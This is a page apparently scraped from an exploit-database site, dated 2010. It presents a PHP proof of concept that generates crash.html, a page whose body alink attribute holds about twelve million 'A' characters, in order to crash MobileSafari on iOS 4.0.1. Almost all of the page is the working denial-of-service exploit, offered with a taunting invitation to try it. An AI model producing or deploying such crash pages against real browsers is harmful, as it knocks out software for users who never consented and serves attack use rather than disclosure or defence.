Home / os / win7

[dos / poc] - Apple iPhone Safari (body alink) Remote Crash

Posted on 20 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Apple iPhone Safari (body alink) Remote Crash | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Apple iPhone Safari (body alink) Remote Crash by Pr0T3cT10n in dos / poc | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>============================================= Apple iPhone Safari (body alink) Remote Crash ============================================= &lt;?php # _ ____ __ __ ___ # (_)____ _ __/ __ / /_____ ____/ / _/_/ | # / // __ | / / / / / //_/ _ / __ / / / / / # / // / / / |/ / /_/ / ,&lt; / __/ /_/ / / / / / # /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/ # Live by the byte |_/_/ # # Members: # # Pr0T3cT10n # -=M.o.B.=- # TheLeader # Sro # Debug # # Contact: inv0ked.israel@gmail.com # # ----------------------------------- # The following code is a proof of concept for a crash vulnerability that exists in &#039;Apple iPhone MobileSafari&#039;. # Point your browser to the created(crash.html) file and see what happen ;) # The vulnerable tag is: # * &lt;body alink=&quot;A x 12000085&quot;&gt; # ----------------------------------- # Exploit Title: Apple iPhone Safari (body alink) Remote Crash # Date: 19/12/2010 # Author: Pr0T3cT10n # Affected Version: IOS 4.0.1 # Tested on Apple iPhone 3, IOS 4.0.1 MobileSafari # Launch Safari, point your browser to the page and safari will crash. # ISRAEL, NULLBYTE.ORG.IL $string = str_repeat(&#039;A&#039;, 12000085); $code = &quot;&lt;html&gt; &lt;head&gt; &lt;title&gt;Apple iPhone Safari (body alink) Remote Crash&lt;/title&gt; &lt;/head&gt; &lt;body alink=&#039;{$string}&#039;&gt; &lt;/body&gt; &lt;/html&gt;&quot;; if(file_put_contents(&quot;./crash.html&quot;, $code)) { echo(&quot;Point your safari mobile browser to `crash.html`. &quot;); } else { echo(&quot;Cannot create file. &quot;); } ?&gt; # <a href='http://1337db.com/'>1337db.com</a> [2010-12-20]</pre></body></html>

 

TOP